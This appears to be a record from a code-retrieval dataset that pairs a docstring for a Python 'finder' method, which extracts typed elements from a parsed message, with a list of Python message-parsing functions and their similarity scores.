dict.\"\r\n \" Received queue_msg = %s\", queue_msg)\r\n raise\r\n msg = result['msg']\r\n return msg", "def __parse(self, ch, method, properties, body: bytes):\n input_msg = body.decode()\n request = json.loads(input_msg)\n answer_msg = {}\n err_code = 0\n err_msg = \"\"\n req_id = request.get(\"id\")\n try:\n tag = request[\"tag\"]\n if tag == \"who_are_you\":\n answer_msg = self.whoami()\n elif tag == \"task\":\n answer_msg = self.generate()\n else:\n err_code = -2\n err_msg = \"Unexpected param\"\n except KeyError:\n err_code = -1\n err_msg = \"Error request parsing\"\n finally:\n self.__answer(json.dumps({\"req_id\": req_id,\n \"data\": answer_msg,\n \"err\": {\"code\": err_code,\n \"msg\": err_msg}}))", "def __parse_message_as(msg_type: type, msg_str: str) -> Any:\n # parse the message\n msg_dict = json.loads(msg_str)\n\n # the type specified in the message needs to match\n # the type we are parsing as\n assert msg_dict[MSG_TYPE_NAME] == msg_type.__name__, \\\n f\"Message type did not match the parsing type,\" \\\n f\"parsing the message as type {msg_type.__name__},\" \\\n f\"but get a message of type {msg_dict[MSG_TYPE_NAME]}\"\n\n # remove the message type information, and create the object\n del msg_dict[MSG_TYPE_NAME]\n return msg_type(**msg_dict)", "def _unwrap(self, msg):\n return msg['content']['data']", "def deserialize(self, data):", "def parse(cls, buf: memoryview, params: Params) \\\n -> tuple[AnyParseable, memoryview]:\n for data_type in params.expected:\n try:\n return data_type.parse(buf, params)\n except NotParseable:\n pass\n raise UnexpectedType(buf)", "def fromData(self, data):\n\n self.reset()\n request = \"\"\n version = None\n args = {}\n\n # Parse raw data to construct message (strip empty lines)\n lines = [line.strip() for line in data.splitlines() if line.strip() != \"\"]\n # If message is empty, return false\n if not lines:\n return False\n # Parse request line\n requestLinePattern = re.compile(r'^\\s*(\\w+)\\s+SOLIPSIS/(\\d+\\.\\d+)\\s*$')\n requestLineMatch = requestLinePattern.match(lines[0])\n if requestLineMatch is None:\n raise EventParsingError(\"Invalid request syntax: \" + lines[0])\n\n # Request is first word of the first line (e.g. NEAREST, or BEST ...)\n request = requestLineMatch.group(1).upper()\n # Extract protocol version\n version = float(requestLineMatch.group(2))\n\n # Basic sanity check\n if version > VERSION:\n raise EventParsingError(\"Unexpected protocol version: %s\" % str(version))\n elif version < VERSION:\n self.logger.info(\"Received message from older protocol version: %s\" % str(version))\n if not REQUESTS.has_key(request):\n raise EventParsingError(\"Unknown request: \" + request)\n\n # Get args for this request\n argList = REQUESTS[request]\n\n # Now let's parse each parameter line in turn\n argPattern = re.compile(r'^\\s*([-\\w]+)\\s*:\\s*(.*?)\\s*$')\n for line in lines[1:]:\n argMatch = argPattern.match(line)\n if argMatch is None:\n raise EventParsingError(\"Invalid message syntax:\\r\\n\" + data)\n\n # Get arg name and arg value\n argName = argMatch.group(1)\n argVal = argMatch.group(2)\n\n # Log optional\n if argName not in argList:\n self.logger.debug(\"Optional argument '%s' in message '%s'\" % (argName, request))\n\n # Each arg has its own syntax-checking regex\n # (e.g. for a calibre we expect a 3-digit number)\n if ARGS_SYNTAX.has_key(argName):\n argSyntax = re.compile('^' + ARGS_SYNTAX[argName] + '$')\n else:\n raise EventParsingError(\"Unknown arg '%s'\" % (argName))\n if not argSyntax.match(argVal):\n raise EventParsingError(\"Invalid arg syntax for '%s': '%s'\" % (argName, argVal))\n\n # The syntax is correct => add this arg to the arg list\n if args.has_key(argName):\n raise EventParsingError(\"Duplicate value for arg '%s'\" % argName)\n args[argName] = ARGS_CONSTRUCTOR[argName](argVal)\n\n # Check that all required fields have been encountered\n for argName in argList:\n if not args.has_key(argName):\n raise EventParsingError(\"Missing argument '%s' in message '%s'\" % (argName, request))\n\n # Everything's ok\n self.request = request\n self.args = args\n self.data = data\n return True", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def parse(self):\n if not self.header_parsed:\n self.parse_header()", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n result.append({})\n\n for prop in self.pattern.findall(msg):\n key = prop.split(\"=\")[0]\n value = prop.split('\"')[1]\n\n if key == \"CM\":\n try:\n value = float(value)\n except:\n pass\n if key == \"CLASSID\":\n try:\n value = int(value)\n except:\n pass\n result[-1][key] = value\n\n return result", "def populate_data_from_message(self, msg):\n for field in self:\n try:\n setattr(field, 'data', getattr(msg, field.name))\n except:\n continue", "def parse(self, data):\n\n ## before actions\n if OPTIONS['enter-exit-debug']:\n self.__class__._recurse_depth += 1\n print str(self.__class__._recurse_depth) + \": Entering 'do_parse' for: \"+self.__class__.__name__+\" with '\"+data.peek_clean()+\"'\"\n\n ## real work\n result = self.do_parse(data)\n\n ## after actions\n if OPTIONS['enter-exit-debug']:\n self.__class__._recurse_depth -= 1\n print str(self.__class__._recurse_depth) + \": Leaving 'do_parse' for: \"+self.__class__.__name__+\"(\"+str(bool(result))+\")\"+\" with '\"+data.peek_clean()+\"'\"\n\n return result", "def _process_message(self, obj):\n pass", "def handle_message(self, data):\r\n print data\r\n\r\n #video stream starts\r\n if data[:13] == 'video_stream:':\r\n #port will be between 3000 to 7000\r\n port = int(data[13:17])\r\n self.partnum = int(data[18:])\r\n\r\n #creates a video file in cache\r\n if not exists(CASHE + movie_name + '\\\\'):\r\n makedirs(CASHE + movie_name + '\\\\')\r\n\r\n self.receive = Receiver(port, self.partnum, CASHE + movie_name + '\\\\')\r\n self.receive.start()\r\n\r\n #upload stream approved\r\n elif data[:16] == 'upload_approved:':\r\n port = int(data[16:])\r\n self.uploader = Uploader(port, upload_path)\r\n self.uploader.start()\r\n self.upload_num = 1\r\n\r\n elif data[:6] == 'parts:':\r\n if data[6:].isdigit():\r\n self.partnum = int(data[6:])\r\n\r\n elif data[:8] == 'invalid:':\r\n self.uploader = None\r\n if data[8:] == 'hash':\r\n self.upload_num = 2\r\n else:\r\n self.upload_num = 3\r\n\r\n print 'invalid upload'\r\n\r\n elif data == 'vid_not_found':\r\n self.partnum = -1\r\n print 'could not watch vid'\r\n\r\n elif data[:8] == 'results:':\r\n results = data[8:].split(':<!>:')\r\n self.res_list = [['Movie Name', 'views', 'grade']]\r\n for i in results:\r\n datas = i.split(':!:')\r\n self.res_list.append(datas)\r\n self.print_results = True\r\n '''if results == ['']:\r\n self.print_results = False\r\n else:\r\n self.print_results = True'''", "def Parse(cls, event):\n raw_data_type = event.get(u'data_type')\n data_type = None\n\n if isinstance(raw_data_type, basestring):\n data_type = raw_data_type\n elif isinstance(raw_data_type, dict):\n data_type = raw_data_type.get(u'stream')\n\n if data_type in cls._parser_clases:\n parsed_data = cls._parser_clases[data_type].Parse(event)\n\n if not parsed_data or parsed_data.IsEmpty():\n return event_data.EventData()\n\n parsed_data.event_data_type = data_type\n target_datum_candidates = [\n parsed_data.Get(event_data.MachineName(target=True)),\n parsed_data.Get(event_data.Ip(target=True)),\n parsed_data.Get(event_data.StorageFileName(target=True))]\n target_id = utils.FirstValidDatum(\n target_datum_candidates, default=u'UNKNOWN')\n\n for inf in [event_data.UserName(target=True),\n event_data.UserId(target=True)]:\n inf = parsed_data.Get(inf)\n if inf:\n inf.value += u'@' + target_id\n\n source_datum_candidates = [\n parsed_data.Get(event_data.MachineName(source=True)),\n parsed_data.Get(event_data.Ip(source=True)),\n parsed_data.Get(event_data.StorageFileName(source=True))]\n source_id = utils.FirstValidDatum(\n source_datum_candidates, default=u'UNKNOWN')\n\n for inf in [event_data.UserName(source=True),\n event_data.UserId(source=True)]:\n inf = parsed_data.Get(inf)\n if inf:\n inf.value += u'@' + source_id\n\n\n parsed_data.timestamp = event.get(u'timestamp')\n uuid = event.get(u'uuid', cls.GetNextEventId())\n parsed_data.event_id = event.get(u'timesketch_id', uuid)\n return parsed_data\n else:\n return event_data.EventData()" ]
[ "0.7193137", "0.6979878", "0.6934807", "0.6921208", "0.670192", "0.66826284", "0.66826284", "0.66826284", "0.66826284", "0.66752", "0.66359085", "0.6599634", "0.6561199", "0.6499567", "0.6447754", "0.6330373", "0.6247721", "0.62246966", "0.61490583", "0.61253613", "0.61129683", "0.6079707", "0.6076046", "0.6066148", "0.6052577", "0.6040321", "0.5992207", "0.5990528", "0.5982665", "0.59667355", "0.5965855", "0.5952658", "0.59513175", "0.59503895", "0.5949345", "0.594932", "0.594576", "0.5944557", "0.5944402", "0.5936024", "0.5912703", "0.590844", "0.5898976", "0.58953035", "0.58902305", "0.5866859", "0.58655846", "0.58594906", "0.58487195", "0.5807204", "0.5797157", "0.5795831", "0.5793954", "0.5792674", "0.57860035", "0.5782702", "0.57752526", "0.5760482", "0.5753625", "0.57049", "0.56982136", "0.56894255", "0.5679022", "0.567186", "0.566648", "0.56612235", "0.5659188", "0.56565106", "0.5653891", "0.56538504", "0.5639366", "0.56348044", "0.56304383", "0.5630299", "0.56197083", "0.5608648", "0.5606191", "0.5605622", "0.5597577", "0.55821145", "0.55707926", "0.5565751", "0.55606985", "0.55573624", "0.5553231", "0.55483717", "0.554103", "0.5540279", "0.5533201", "0.55310977", "0.5529249", "0.55289376", "0.5527955", "0.5526273", "0.55236197", "0.5521488", "0.55108994", "0.5500505", "0.5490922", "0.54888815" ]
0.58469677
49
return elements in the message with given parameters match is the type of elements you want to get (check the parse_type variable to see possibilities) using ! at start of match will reverse the value of positive occurences will create the nth indexes elements to capture None will find everything
def finder(self, match="w", occurences=None, start=None, stop=None, trigger=True, positive=True, reverse=False, keep_prefix=False): res = [] length = len(self.parse_type) if occurences != None: occurences = str(occurences) index_array = self.indexes(occurences, 1) is_capturing = (start == None) target = 0 if match == None: match = "xwoifmrcs" if len(match) > 0 and match[0] == "!": positive = (positive == False) for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1): #xd lol if is_capturing == False: if type(start) == type(0): is_capturing = (idx == start) else: is_capturing = (self.parse_type[idx] in start) if stop != None: if trigger == True or is_capturing == True: if type(stop) == type(0) and (idx == stop): break if type(stop) == " " and (self.parse_type[idx] in stop): break if is_capturing == True: if (self.parse_type[idx] in match) == positive: if target in index_array: res.append(self.parse_msg[idx][(keep_prefix == False and self.parse_type[idx] in "ox"):]) target += 1 if len(res) == 0: return None return res
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _any_depth_parse(match):\n markers = [match.p1, match.p2, match.p3, match.p4, match.p5, match.p6]\n for idx in (4, 5):\n if markers[idx]:\n markers[idx] = mtypes.emphasize(markers[idx])\n return [m for m in markers if m]", "def onNameType(self, match):\n\t\treturn [self.process(match[0]), self.process(match[1])]", "def getMatch(data):\n if len(data) > 15:\n return 'date: {0} {1}, match => {2}, {3}, {4}| 1x2 => {5}, {6}, {7}| handicap => {8}, {9}, {10}, {11}| OU => {12}, {13}, {14}, {15}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[14], data[15], data[16])\n return 'date: {0} {1}, match => {2}, {3}, {4}| handicap => {5}, {6}, {7}, {8}| OU => {9}, {10}, {11}, {12}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13])", "def split_match(self, match):\n\n match, line, col, error, warning, message, near = super().split_match(match)\n\n if line is not None and line == -1 and message:\n line = 0\n\n return match, line, col, error, warning, message, near", "def tok_match_record(matchlist, remainder_str, xtoken, matched_substr):\n\tpstr_infostr = matched_substr\n\txtok_infostr = re.sub(r'<([^<>\"]{1,3})\\w*(?: \\w+=\"([^<>\"]{1,3})\\w*\")?>',\n\t r'\\1',\n\t xtoken.tagout)\n\t# print(\"SAVE p-substr:'%s' =~ m/%s/ix\" % (pstr_infostr,xtok_infostr),file=sys.stderr)\n\t\n\t# -a- préparation du substitut balisé en xml\n\t# £ pseudo_out == 'rendu'\n\t# debg\n\tpseudo_out = xtoken.tagout+str_escape(matched_substr)+xtoken.endout\n\t\n\t# -b- enregistrement\n\tmatchlist.append(pseudo_out)\n\ti = len(matchlist)\n\t\n\t# -c- effacement dans le remainder\n\t# (substitution par un renvoi à la \\4 ex: #(#4#)#)\n\t# £todo!!! : interdire matches dans les renvois précédents (exemple n° volume == n° de renvoi) !\n\tremainder_str = re.sub(xtoken.re, \"#(#%i-%s#)#\" % (i, xtok_infostr), remainder_str)\n\t\n\treturn(matchlist, remainder_str)", "def logs(self, **kwargs):\n matches = []\n for record in self.buffer:\n found_match = True\n for (key, value) in kwargs.items():\n if key == 'msg':\n # Regexp match\n if not re.search(value, str(record.get(key))):\n found_match = False\n break\n elif key == 'args':\n for (exp, act) in zip(value, record.get(key)):\n if not re.search(str(exp), str(act)):\n found_match = False\n break\n elif not value == record.get(key):\n found_match = False\n break\n if found_match:\n matches.append(record)\n return matches", "def onExpressionList(self, match):\n\t\thead=self.process(match[0])\n\t\ttail=self.process(match[1])\n\t\tres=[head]\n\t\tfor _ in tail:\n\t\t\tres.append(_[1])\n\t\treturn res", "def processMatch(match, justLabel=False):\n response = []\n staticAttrs = [ 'gameId' , 'gameDuration' ]\n if not 'participants' in match or len(match['participants']) < 1:\n raise Exception('[-] wrong match!')\n if justLabel:\n response += staticAttrs\n firstPart = match['participants'][0]\n response += extractAttrs(firstPart, justLabel)\n return response\n for participant in match['participants']:\n partAttrs = []\n # firstly adding the static attributes\n for staticKey in staticAttrs:\n partAttrs += [match[staticKey]]\n # then the others\n partAttrs += extractAttrs(participant)\n response.append(partAttrs)\n return response", "def split_match(self, match):\n\n match, line, col, error, warning, message, near = super().split_match(match)\n\n if match:\n message = '[xvlog] ' + message\n\n return match, line, col, error, warning, message, near", "def extractTagsAndParams(self, elements, text, matches):\n stripped = u''\n \n taglist = u'|'.join(elements)\n if taglist not in _startRegexHash:\n _startRegexHash[taglist] = re.compile(ur\"<(\" + taglist + ur\")(\\s+[^>]*?|\\s*?)(/?>)|<(!--)\", re.UNICODE | re.IGNORECASE)\n start = _startRegexHash[taglist]\n \n while text != u'':\n p = start.split(text, 1)\n stripped += p[0]\n if len(p) == 1:\n break\n elif p[4]:\n # comment\n element = p[4]\n attributes = u''\n close = u''\n else:\n element = p[1]\n attributes = p[2]\n close = p[3]\n inside = p[5]\n \n global _extractTagsAndParams_n\n marker = self.uniq_prefix + u'-' + element + u'-' + (u\"%08X\" % _extractTagsAndParams_n) + u'-QINU'\n _extractTagsAndParams_n += 1\n stripped += marker\n \n if close == u'/>':\n # empty element tag, <tag />\n content = ''\n text = inside\n tail = ''\n else:\n if element == u'!--':\n end = _endCommentPat\n else:\n if element not in _endRegexHash:\n _endRegexHash[element] = re.compile(ur'(</' + element + ur'\\s*>)', re.UNICODE | re.IGNORECASE)\n end = _endRegexHash[element]\n q = end.split(inside, 1)\n content = q[0]\n if len(q) < 3:\n # no end tag\n tail = ''\n text = ''\n else:\n tail = q[1]\n text = q[2]\n \n matches[marker] = (\n element,\n content,\n self.decodeTagAttributes(attributes),\n u\"<\" + element + attributes + close + content + tail\n )\n return stripped", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n if match:\n message = '[vcom] ' + message\n return match, line, col, error, warning, message, near", "def _matchPart(self, part):\r\n return [{**{key.name:p[key.name] for key in self.groups},\r\n **({#Call recursively on nested subpattern\r\n self.name:self.nestedPattern._matchPart(\r\n #and match\r\n p[0])}\r\n #only if subpattern exists\r\n if self.nestedPattern is not None else {})}\r\n for p in re.finditer(self.regex, part)\r\n #discard any record in ignored\r\n if not any([p[key.name] in self.ignored[key]\r\n for key in self.ignored])]", "def parse_last_exception(message):\n for pattern, response in patterns:\n items_found = re.findall(pattern, repr(message))\n if items_found:\n #print(\"FOUND\", items_found)\n print_exception_message(response, items_found[0])\n break\n else:\n unrecognised_exception(message)", "def logs(self, **kwargs):\n matches = []\n for record in self.buffer:\n found_match = True\n for (key, value) in kwargs.items():\n if key == 'msg':\n # Regexp match\n if not re.search(value, str(record.get(key))):\n found_match = False\n break\n elif not value == record.get(key):\n found_match = False\n break\n if found_match:\n matches.append(record)\n return matches", "def _parse_msg(msg):\n split_args_regex = \"(.*?)\\:(.*)\"\n args_split_regex = \"\\,\"\n match = re.match(split_args_regex, msg)\n if match is not None:\n message = match.group(1)\n arg_str = match.group(2)\n arg_iter = re.finditer(args_split_regex, args)\n args = []\n for arg in arg_iter:\n args.append(arg) \n return None", "def message_matches(cls, msg, regex):\n m = regex.match(msg.text)\n if m:\n return m.groups()\n return None", "def getContentList(self, content, index=-1):\n try:\n if index == -1: # this is a return for a single instance site\n repattern = re.compile(self.RegEx, re.IGNORECASE)\n foundlist = re.findall(repattern, content)\n return foundlist\n else: # this is the return for a multisite\n repattern = re.compile(self.RegEx[index], re.IGNORECASE)\n foundlist = re.findall(repattern, content)\n return foundlist\n except:\n self.postErrorMessage(self.ErrorMessage + \" \" + self.FullURL)\n return None", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n\n no_doc_index = message.find(\"has no :Doc\")\n if no_doc_index > 0:\n error = False\n warning = \"Warning\"\n near = message[:no_doc_index].strip()\n elif message.startswith(\"@HV\"):\n near = \"@HV\"\n\n if error:\n error = \" \"\n elif warning:\n warning = \" \"\n else:\n error = \" \"\n\n if (match is None) or match.group('filename').startswith('atcc-'):\n return match, line, col, error, warning, message, near\n\n temp_name = match.group('filename')\n if ((self.LastIncludeMatch is not None) and\n (self.LastIncludeMatch[0:2] == (self.filename, temp_name))):\n region = self.LastIncludeMatch[2]\n else:\n region = self.view.find(r\"\\s*File\\s+\" + temp_name, 0)\n self.LastIncludeMatch = (self.filename, temp_name, region)\n\n if region is not None:\n line = self.view.rowcol(region.begin())[0] + 1\n near = temp_name\n return match, line, col, error, warning, message, near\n else:\n return match, None, None, None, None, None, None", "def parse(cls, buf: memoryview, params: Params) \\\n -> tuple[AnyParseable, memoryview]:\n for data_type in params.expected:\n try:\n return data_type.parse(buf, params)\n except NotParseable:\n pass\n raise UnexpectedType(buf)", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n\n list = self.pattern.findall(msg)\n for prop in list:\n if \"WORD\" in prop:\n value = prop.split('\"')[1]\n result.append(value)\n return result", "def match(self):\n\n # We initate this variable which gonna contain the returned data\n result = []\n\n # We compile the regex string\n to_match = comp(self.regex)\n\n # In case we have to use the implementation of ${BASH_REMATCH} we use\n # re.findall otherwise, we use re.search\n if self.rematch: # pylint: disable=no-member\n pre_result = to_match.findall(self.data)\n else:\n pre_result = to_match.search(self.data)\n\n if self.return_data and pre_result is not None: # pylint: disable=no-member\n if self.rematch: # pylint: disable=no-member\n for data in pre_result:\n if isinstance(data, tuple):\n result.extend(list(data))\n else:\n result.append(data)\n\n if self.group != 0: # pylint: disable=no-member\n return result[self.group] # pylint: disable=no-member\n else:\n result = pre_result.group(\n self.group # pylint: disable=no-member\n ).strip()\n\n return result\n elif (\n not self.return_data # pylint: disable=no-member\n and pre_result is not None\n ):\n return True\n return False", "def test_searchOrMessageSet(self):\n return self._messageSetSearchTest('OR 2:* 2:*', [2, 3, 4, 5])", "def filter_args_num(self, matches: str, args: int) -> List[str]:\n filtered: List[str] = []\n if args == 1:\n for i, match in enumerate(matches):\n if match.endswith(\"/arg\"):\n filtered.append(matches[i][:-4])\n else:\n for i, match in enumerate(matches):\n if match.endswith(\"/arg[%d]\" % args):\n # Make sure we don't cause an IndexError (end of list)\n # Check to make sure arg + 1 doesn't exist\n if (i == (len(matches) - 1) or\n not matches[i + 1].endswith(\"/arg[%d]\" %\n (args + 1))):\n filtered.append(matches[i][:-len(\"/arg[%d]\" % args)])\n\n return filtered", "def test_multi_no_match_return_expr(self):\n eq_(None,line_matches_greps(self.line,[\"foo\",\"idontmatch\"]))", "def test_searchAndMessageSet(self):\n return self._messageSetSearchTest('2:* 3', [3])", "def missed_matches(self, match_type) -> list:\n missed = []\n for result in self.get_results(match_type, TestSearchResult.Source.LEGACY.value):\n if result['pairedIndex'] == -1:\n missed.append(result)\n return missed", "def findall_simple(pattern, string):\n return [x[0] if isinstance(x, tuple) else x for x in re.findall(pattern=pattern, string=string)]", "def process_match(text, pos):\n m, _ = parse_ent('<' + text + '>', pos - len(text))\n return len(text) - len(m) + 2", "def test_multi_match_return_expr(self):\n eq_(None,line_no_matches_ngreps(self.line,[\"foo\",\"bar\"]))", "def handleMatch(self, m):\r\n pass", "def findAllMatches(re_string, text, handler, start=0):\n regex = re.compile(re_string, re.MULTILINE | re.DOTALL | re.IGNORECASE)\n match = regex.search(text, start)\n results = []\n \n startpoint = -1\n endpoint = -1\n \n if match:\n startpoint = match.start()\n \n while match:\n start = match.end()\n results.append(handler(match))\n endpoint = match.end()\n match = regex.search(text, start)\n \n returntext = text\n if startpoint != -1 and endpoint != -1:\n returntext = text.replace(text[startpoint:endpoint], \"\")\n\n return results, returntext", "def _parse_preprocess(match):\n match_transformed = []\n substructs = {} #{Count: substruct}\n def preprocess_func(leaf):\n \"\"\" evaluates all Count instances so that they refer to fixed group \"\"\"\n if isinstance(leaf, Repeated):\n new_leaf = leaf.count.value # evaluates and stores value directly\n # CAUTION: +1 as we now start counting at 0, but regex start counting at 1 for groups\n match_transformed.append(match.ends(new_leaf + 1))\n # recursive call\n leaf.structure.map(preprocess_func)\n # from here on everything is executed depth first (by recursion)\n substructs[new_leaf] = leaf.structure\n\n # elif isinstance(leaf, Count):\n else: #there should be no other case\n new_leaf = leaf.value # evaluates and stores value directly\n # CAUTION: +1 as we now start counting at 0, but regex start counting at 1 for groups\n match_transformed.append((match.ends(new_leaf + 1), match.captures(new_leaf + 1)))\n\n return new_leaf # new_leaf is int\n\n return match_transformed, substructs, preprocess_func", "def parse_message(message):\n request_iter = request_regex.finditer(message.body())\n requests = []\n for build_request in request_iter:\n requests.append(determine_request(build_request))\n if requests:\n results = serverset.build_request(requests)\n message.reply(build_reply(results))", "def _match(self) -> None:\n self.matched = [i for i in self.data if self.match(i)]\n self.unmatched = [i for i in self.data if not self.match(i)]", "def MatchAll():\n return {\"match_all\": {}}", "def msg_ele(msg):\n for word in msg:\n if '=' in word:\n return\n yield word", "def Parse(self):\n for element in self.elements:\n if isinstance(element, Placeholder):\n self._MatchTextPlaceholder(element)\n else:\n self._MatchNode(element)", "def look(self):\n\t\tself.send(\"look\")\n\t\tmsg = self.recv()\n\n\t\tmsg_tokens = []\n\t\ttiles = []\n\n\t\tfor i in range(msg.size()):\n\t\t\tmsg_tokens.append(msg.get(i))\n\t\tfor tok in msg_tokens:\n\t\t\ttiles.append(tok.split(\"|\"))\n\n\t\treturn tiles", "def onExpressionBlock(self, match):\n\t\tlines=self.process(match[1])\n\t\tres=[]\n\t\tfor _ in lines:\n\t\t\tres = (res + _[2])\n\t\treturn res", "def parse_rrs(payload, offset, quantity):\n rrs = []\n for i in range(quantity):\n subtype = get_record_type(payload, offset)\n # print \"subtype \" + subtype\n rr, length = subtype.fromData(payload, offset)\n rrs.append(rr)\n offset += length\n \n return rrs, offset", "def test_searchMessageSetWithList(self):\n # 6 is bigger than the biggest message sequence number, but that's\n # okay, because N:* includes the biggest message sequence number even\n # if N is bigger than that (read the rfc nub).\n return self._messageSetSearchTest('(6:*)', [5])", "def process_matches(matches: List[EndpointMatch]) -> List[Result] :\n out=[]\n #sort data\n sort_f = lambda match: match.endpoint_1.name\n sorted_matches = sorted(matches, key = sort_f)\n #group by endpoint 1\n for key, group in itertools.groupby(sorted_matches, key = sort_f ):\n #sort by score\n endpoint_matches = sorted(list(group), key = lambda match: match.score,reverse=True)\n #best match\n best_match = endpoint_matches[0]\n #others\n other_matches = \";\".join([f\"{a.endpoint_2.name}|{a.score:.3g}\" for a in endpoint_matches[1:] ])\n\n out.append(Result(\n best_match.endpoint_1.name,\n best_match.endpoint_2.name,\n best_match.score,\n \";\".join(best_match.endpoint_1.matches),\n \";\".join(best_match.endpoint_2.matches),\n best_match.endpoint_1.regex,\n best_match.endpoint_2.regex,\n other_matches\n ))\n return out", "def parseMsg(self):\n # These 4 elements are always present\n # \"ToUserName\"\n # \"FromUserName\"\n # \"CreateTime\"\n # \"MsgType\"\n\n # Following elements depends on MsgType\n # \"MsgId\"\n # \"Content\"\n # \"MediaId\"\n # \"PicUrl\"\n # \"Format\"\n # \"ThumbMediaId\"\n # \"Location_X\"\n # \"Location_Y\"\n # \"Scale\"\n # \"Label\"\n # \"Title\"\n # \"Description\"\n # \"Url\"\n # \"Event\"\n # \"EventKey\"\n # \"Ticket\"\n # \"Latitude\"\n # \"Longitude\"\n # \"Precision\"\n # \"Recognition\"\n\n def getField(req, key):\n if req.find(key) != None:\n return req.find(key).text\n\n\n msg = {}\n req = et.fromstring(self.request.body.decode(\"utf-8\"))\n\n # These 4 elements are always present\n msg[\"ToUserName\"] = getField(req, \"ToUserName\")\n msg[\"FromUserName\"] = getField(req, \"FromUserName\")\n msg[\"CreateTime\"] = getField(req, \"CreateTime\")\n msg[\"MsgType\"] = getField(req, \"MsgType\")\n\n # Following elements depends on MsgType\n msg[\"MsgId\"] = getField(req, \"MsgId\")\n msg[\"Content\"] = getField(req, \"Content\")\n msg[\"MediaId\"] = getField(req, \"MediaId\")\n msg[\"PicUrl\"] = getField(req, \"PicUrl\")\n msg[\"Format\"] = getField(req, \"Format\")\n msg[\"ThumbMediaId\"] = getField(req, \"ThumbMediaId\")\n msg[\"Location_X\"] = getField(req, \"Location_X\")\n msg[\"Location_Y\"] = getField(req, \"Location_Y\")\n msg[\"Scale\"] = getField(req, \"Scale\")\n msg[\"Label\"] = getField(req, \"Label\")\n msg[\"Title\"] = getField(req, \"Title\")\n msg[\"Description\"] = getField(req, \"Description\")\n msg[\"Url\"] = getField(req, \"Url\")\n msg[\"Event\"] = getField(req, \"Event\")\n msg[\"EventKey\"] = getField(req, \"EventKey\")\n msg[\"Ticket\"] = getField(req, \"Ticket\")\n msg[\"Latitude\"] = getField(req, \"Latitude\")\n msg[\"Longitude\"] = getField(req, \"Longitude\")\n msg[\"Precision\"] = getField(req, \"Precision\")\n msg[\"Recognition\"] = getField(req, \"Recognition\")\n return msg", "def process_match(\n self,\n entry, \n test_index, \n test, \n defaults\n ):\n format_string = ''\n if \"test_exception\" in entry and \\\n entry[\"test_exception\"] is not None:\n out_string = entry[\"test_exception\"]\n else:\n if \"format\" in test:\n format_string = test[\"format\"]\n elif \"format\" in defaults:\n format_string = defaults[\"format\"]\n else:\n return \n out_string = Output.populate_format(entry, format_string)\n self.results.append(out_string)", "def test_searchNotMessageSet(self):\n return self._messageSetSearchTest('NOT 2:*', [1])", "def split_fix_msgs( longstring ) :\n return tuple( filter(lambda x: x, re.split('(8=FIX\\\\.[45]\\\\.[0-9]\\x01.*?\\x0110=[0-9]{3}\\x01)', longstring)) )", "def find_matches_to_message(\n self, message: str\n ) -> Tuple[Optional[str], Optional[Module]]:\n processed_message = message.lower()\n for _, module in self.modules.get_modules():\n if not module.is_loaded:\n continue\n for func_name, reg_list in module.module_settings.templates.items():\n for reg in reg_list:\n find_match = re.findall(reg, processed_message)\n if find_match:\n return (func_name, module)\n\n return (None, None)", "def parse_list_payload(payload):\n # the payload begins with a constant header\n if payload[0] != 'cbu':\n raise ValueError('Invalid list payload header: {}'.format(payload[0]))\n\n # the first submessage is always present, so let's treat it light a header\n first_submsg = payload[1][0][0]\n if len(first_submsg) == 5:\n (unknown_int, unknown_none, unknown_str, unknown_none_or_list,\n timestamp) = first_submsg\n unknown_list = None\n elif len(first_submsg) == 6:\n (unknown_int, unknown_none, unknown_str, unknown_none_or_list,\n timestamp, unknown_list) = first_submsg\n else:\n raise ValueError('Cannot parse first submessage: {}'\n .format(first_submsg))\n\n # The type of a submessage is determined by its position in the array\n submsgs = payload[1][0][1:]\n for submsg_type, submsg in enumerate(submsgs):\n if submsg is None:\n pass\n elif submsg_type == 1:\n # parse chat message\n conversation_id = submsg[0][0][0]\n sender_ids = submsg[0][1]\n timestamp = submsg[0][2]\n content = submsg[0][6]\n type_ = content[2][0][0][0]\n if type_ == 0: # text\n type_, text, formatting = content[2][0][0]\n links = None\n elif type_ == 2: # link\n type_, text, formatting, links = content[2][0][0]\n else:\n raise ValueError('Unknown message type {} for message: {}'\n .format(type_, submsg))\n yield {\n 'conversation_id': conversation_id,\n 'timestamp': timestamp,\n 'sender_ids': tuple(sender_ids),\n 'text': text,\n }\n\n elif submsg_type == 2:\n # TODO: parse unknown\n # conversation_id, sender_ids, timestamp, 1, 20\n pass\n elif submsg_type == 3:\n # TODO: parse unknown\n # conversation_id, sender_ids, timestand, 1 or 2\n pass\n elif submsg_type == 6:\n # TODO: parse unknown\n # sender_ids, conversation_id, timestamp\n pass\n elif submsg_type == 11:\n # TODO: parse conversation update\n pass\n elif submsg_type == 12:\n # TODO: parse unknown\n pass\n else:\n raise ValueError('Unknown submessage type {} for submessage {}'\n .format(submsg_type, submsg))", "def match1(text, *patterns):\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret", "def match1(text, *patterns):\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret", "def split_match(self, match):\n\n error = super().split_match(match)\n error['near'] = self.search_token(error['message'])\n\n return error", "async def parse_regex(opsdroid, skills, message):\n matched_skills = []\n for skill in skills:\n for matcher in skill.matchers:\n if \"regex\" in matcher:\n opts = matcher[\"regex\"]\n matched_regex = await match_regex(message.text, opts)\n if matched_regex:\n message.regex = matched_regex\n for regroup, value in matched_regex.groupdict().items():\n 